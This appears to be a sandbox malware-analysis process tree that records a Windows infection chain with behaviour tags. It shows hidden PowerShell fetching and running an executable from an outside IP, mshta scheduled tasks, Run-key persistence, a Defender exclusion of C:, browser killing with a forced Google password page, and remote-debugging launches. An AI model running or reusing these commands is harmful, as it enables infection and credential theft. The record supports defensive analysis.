C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x2a8,0x7ffdfd8cf208,0x7ffdfd8cf214,0x7ffdfd8cf22011⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1900,i,11738978747299671550,12651829876963266545,262144 --variations-seed-version --mojo-platform-channel-handle=2760 /prefetch:311⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2640,i,11738978747299671550,12651829876963266545,262144 --variations-seed-version --mojo-platform-channel-handle=2632 /prefetch:211⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2160,i,11738978747299671550,12651829876963266545,262144 --variations-seed-version --mojo-platform-channel-handle=3136 /prefetch:811⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3504,i,11738978747299671550,12651829876963266545,262144 --variations-seed-version --mojo-platform-channel-handle=3564 /prefetch:111⤵
- Uses browser remote debugging
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3528,i,11738978747299671550,12651829876963266545,262144 --variations-seed-version --mojo-platform-channel-handle=3568 /prefetch:111⤵
- Uses browser remote debugging
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4124,i,11738978747299671550,12651829876963266545,262144 --variations-seed-version --mojo-platform-channel-handle=4340 /prefetch:111⤵
- Uses browser remote debugging
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4140,i,11738978747299671550,12651829876963266545,262144 --variations-seed-version --mojo-platform-channel-handle=4404 /prefetch:211⤵
- Uses browser remote debugging
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3672,i,11738978747299671550,12651829876963266545,262144 --variations-seed-version --mojo-platform-channel-handle=5164 /prefetch:811⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5272,i,11738978747299671550,12651829876963266545,262144 --variations-seed-version --mojo-platform-channel-handle=5288 /prefetch:811⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5216,i,11738978747299671550,12651829876963266545,262144 --variations-seed-version --mojo-platform-channel-handle=5504 /prefetch:811⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5512,i,11738978747299671550,12651829876963266545,262144 --variations-seed-version --mojo-platform-channel-handle=5556 /prefetch:811⤵
-
-
-
-
-
-
C:\ProgramData\sjmg4ohvk6.exe"C:\ProgramData\sjmg4ohvk6.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\x5djnxqf\0ODuzG1RNlB97HZO.exeC:\Users\Admin\AppData\Local\Temp\x5djnxqf\0ODuzG1RNlB97HZO.exe 08⤵
-
C:\Users\Admin\AppData\Local\Temp\x5djnxqf\uqdbQyD9PB0MTVPS.exeC:\Users\Admin\AppData\Local\Temp\x5djnxqf\uqdbQyD9PB0MTVPS.exe 73129⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7436 -s 88410⤵
- Program crash
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7312 -s 6409⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\rqi58" & exit7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 118⤵
- Delays execution with timeout.exe
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"5⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-906OA.tmp\Bell_Setup16.tmp"C:\Users\Admin\AppData\Local\Temp\is-906OA.tmp\Bell_Setup16.tmp" /SL5="$B0268,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT7⤵
-
C:\Users\Admin\AppData\Local\Temp\is-6T00V.tmp\Bell_Setup16.tmp"C:\Users\Admin\AppData\Local\Temp\is-6T00V.tmp\Bell_Setup16.tmp" /SL5="$C0284,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT8⤵
-
C:\Windows\SysWOW64\regsvr32.exe"regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\1wlanapi.ocx"9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"10⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe"PowerShell.exe" -NoProfile -NonInteractive -Command -10⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"10⤵
- Command and Scripting Interpreter: PowerShell
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe6⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe7⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe8⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe9⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe10⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe11⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe12⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe13⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe14⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe15⤵
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe16⤵
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javasupport_platform.exe"17⤵
- Modifies registry key
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javasupport_platform.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe\"'"17⤵
- Command and Scripting Interpreter: PowerShell
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10043020101\jokererer.exe"C:\Users\Admin\AppData\Local\Temp\10043020101\jokererer.exe"5⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\10043990101\23f1b1d543.exe"C:\Users\Admin\AppData\Local\Temp\10043990101\23f1b1d543.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10043990101\23f1b1d543.exe"6⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\10044000101\cc7c970e9b.exe"C:\Users\Admin\AppData\Local\Temp\10044000101\cc7c970e9b.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10044000101\cc7c970e9b.exe"6⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10369180101\a6185a1c25.exe"C:\Users\Admin\AppData\Local\Temp\10369180101\a6185a1c25.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn eMxBOmaLOqv /tr "mshta C:\Users\Admin\AppData\Local\Temp\N6gklyIze.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn eMxBOmaLOqv /tr "mshta C:\Users\Admin\AppData\Local\Temp\N6gklyIze.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\N6gklyIze.hta4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'HNFU8BJ0AI079XZDIORXRB0HMVJZR7C7.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\TempHNFU8BJ0AI079XZDIORXRB0HMVJZR7C7.EXE"C:\Users\Admin\AppData\Local\TempHNFU8BJ0AI079XZDIORXRB0HMVJZR7C7.EXE"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10369190121\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\timeout.exetimeout /t 24⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "lPzi9mao7Aw" /tr "mshta \"C:\Temp\DxW6Q3185.hta\"" /sc minute /mo 25 /ru "Admin" /f4⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\DxW6Q3185.hta"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"6⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10369360101\7c7191c53f.exe"C:\Users\Admin\AppData\Local\Temp\10369360101\7c7191c53f.exe"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\10369370101\e2017b79e5.exe"C:\Users\Admin\AppData\Local\Temp\10369370101\e2017b79e5.exe"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\10369380101\ee73cdd97f.exe"C:\Users\Admin\AppData\Local\Temp\10369380101\ee73cdd97f.exe"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\10369390101\0c4fa493de.exe"C:\Users\Admin\AppData\Local\Temp\10369390101\0c4fa493de.exe"3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- Kills process with taskkill
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1952 -prefsLen 27099 -prefMapHandle 1956 -prefMapSize 270279 -ipcHandle 2032 -initialChannelId {d5438e7e-7977-4e28-8e85-166c5b267ad0} -parentPid 1388 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1388" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2480 -prefsLen 27135 -prefMapHandle 2484 -prefMapSize 270279 -ipcHandle 2492 -initialChannelId {ef71a37c-f86c-4bc5-acbe-8780c884426f} -parentPid 1388 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1388" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3824 -prefsLen 25164 -prefMapHandle 3828 -prefMapSize 270279 -jsInitHandle 3832 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3840 -initialChannelId {19f4f47e-8b3d-424e-93ee-be34b29a94ca} -parentPid 1388 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1388" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3992 -prefsLen 27276 -prefMapHandle 3996 -prefMapSize 270279 -ipcHandle 4064 -initialChannelId {54b2b479-2079-4484-a867-5e848e617705} -parentPid 1388 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1388" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3256 -prefsLen 34775 -prefMapHandle 3260 -prefMapSize 270279 -jsInitHandle 3012 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 1608 -initialChannelId {5a5e41cd-d78c-48ab-ab97-06b5b487e351} -parentPid 1388 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1388" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5060 -prefsLen 35012 -prefMapHandle 5064 -prefMapSize 270279 -ipcHandle 5072 -initialChannelId {cf19431d-0de3-4fcb-8a83-a9a8e424e084} -parentPid 1388 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1388" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5356 -prefsLen 32952 -prefMapHandle 5360 -prefMapSize 270279 -jsInitHandle 5364 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5312 -initialChannelId {b5021e9b-1ae4-428b-b607-3b20ee2704ef} -parentPid 1388 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1388" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3120 -prefsLen 32952 -prefMapHandle 4968 -prefMapSize 270279 -jsInitHandle 5024 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5288 -initialChannelId {a43cc9fa-3719-4927-a861-1b71929328f0} -parentPid 1388 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1388" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5776 -prefsLen 32952 -prefMapHandle 5764 -prefMapSize 270279 -jsInitHandle 5768 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5500 -initialChannelId {9bac5537-f59c-4516-aa58-591b2a0f5cfd} -parentPid 1388 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1388" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab6⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10369400101\2ec689dd14.exe"C:\Users\Admin\AppData\Local\Temp\10369400101\2ec689dd14.exe"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\10369430101\2b3c153da8.exe"C:\Users\Admin\AppData\Local\Temp\10369430101\2b3c153da8.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10369430101\2b3c153da8.exe"4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\10369460101\Rm3cVPI.exe"C:\Users\Admin\AppData\Local\Temp\10369460101\Rm3cVPI.exe"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\10369470101\8d2d845f7b.exe"C:\Users\Admin\AppData\Local\Temp\10369470101\8d2d845f7b.exe"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\10369480101\TbV75ZR.exe"C:\Users\Admin\AppData\Local\Temp\10369480101\TbV75ZR.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7332 -s 5125⤵
- Program crash
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10369490101\hYjiwV0.exe"C:\Users\Admin\AppData\Local\Temp\10369490101\hYjiwV0.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xa8,0x104,0x7ffdfd63dcf8,0x7ffdfd63dd04,0x7ffdfd63dd106⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10369500101\EPTwCQd.exe"C:\Users\Admin\AppData\Local\Temp\10369500101\EPTwCQd.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\10369510101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10369510101\7IIl2eE.exe"3⤵
-
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat4⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"5⤵
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"5⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4183775⤵
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Leon.cab5⤵
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "BEVERAGES" Compilation5⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com5⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N5⤵
-
-
C:\Users\Admin\AppData\Local\Temp\418377\Passwords.comPasswords.com N5⤵
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10369520101\u75a1_003.exe"C:\Users\Admin\AppData\Local\Temp\10369520101\u75a1_003.exe"3⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'5⤵
- Command and Scripting Interpreter: PowerShell
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"4⤵
-
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Remove-MpPreference -ExclusionPath C:\6⤵
-
-
-
